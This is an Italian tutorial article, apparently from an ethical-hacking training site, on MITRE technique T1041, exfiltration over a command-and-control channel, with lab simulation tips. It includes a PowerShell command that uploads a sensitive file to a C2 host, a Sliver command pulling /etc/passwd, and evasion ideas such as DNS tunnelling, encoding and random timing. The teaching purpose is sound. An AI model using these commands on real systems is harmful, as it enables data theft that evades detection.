Furto Dati sul Canale di Comando: Exfiltration Over C2 Channel (T1041)

L'esfiltrazione attraverso il canale di comando e controllo rappresenta una delle tecniche più insidiose nel panorama delle minacce informatiche. Gli attaccanti sfruttano lo stesso canale di comunicazione utilizzato per controllare il malware anche per trafugare dati sensibili, mascherando il furto all'interno del traffico apparentemente legittimo.

Questa tecnica appartiene alla tattica TA0010 (Exfiltration) nella kill chain, rappresentando la fase finale dove l'attaccante porta a termine l'obiettivo primario: sottrarre informazioni di valore. La sua pericolosità sta nella capacità di mimetizzarsi nel traffico C2 già stabilito, rendendo difficile distinguere i comandi dalle esfiltrazioni.

I numeri parlano chiaro: 25 gruppi APT documentati utilizzano questa tecnica, supportati da 156 strumenti malware diversi. Sono state osservate 10 campagne significative che hanno fatto leva su questo metodo, evidenziando come sia diventato uno standard de facto per il furto di dati.

Replicare questa tecnica in laboratorio richiede la comprensione di come i dati vengano incapsulati nel traffico C2. Il metodo più semplice prevede l'utilizzo di protocolli HTTP/HTTPS per mascherare l'esfiltrazione come normale navigazione web.

Su Windows, puoi simulare l'esfiltrazione base con PowerShell: Invoke-WebRequest -Uri "https://c2.lab.local/upload" -Method POST -Body (Get-Content "C:\sensitive\data.txt") -ContentType "application/octet-stream"

Per un approccio più realistico, Empire offre moduli dedicati. Il framework permette di stabilire un canale C2 cifrato e poi estrarre file specifici mantenendo la comunicazione all'interno del protocollo stabilito.

Su Linux, strumenti come Sliver implementano nativamente questa funzionalità. Il comando download /etc/passwd all'interno di una sessione Sliver trasferisce automaticamente il file attraverso il canale C2 esistente, senza aprire nuove connessioni sospette.

La simulazione di tecniche più avanzate richiede l'implementazione di encoding personalizzati. Molti malware codificano i dati in base64 prima dell'invio, oppure li frammentano in piccole porzioni per evitare detection basate sul volume di traffico.

Un aspetto critico da replicare è il timing. I malware sofisticati come ROKRAT implementano ritardi casuali tra i trasferimenti per simulare traffico umano normale. In laboratorio, puoi implementare questa logica con sleep randomici tra le richieste.

Per testare l'esfiltrazione via DNS, tecnica utilizzata da Ebury, puoi utilizzare dnscat2 che incapsula i dati in query DNS apparentemente legittime. Questo metodo è particolarmente efficace in ambienti dove solo il traffico DNS è permesso in uscita.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo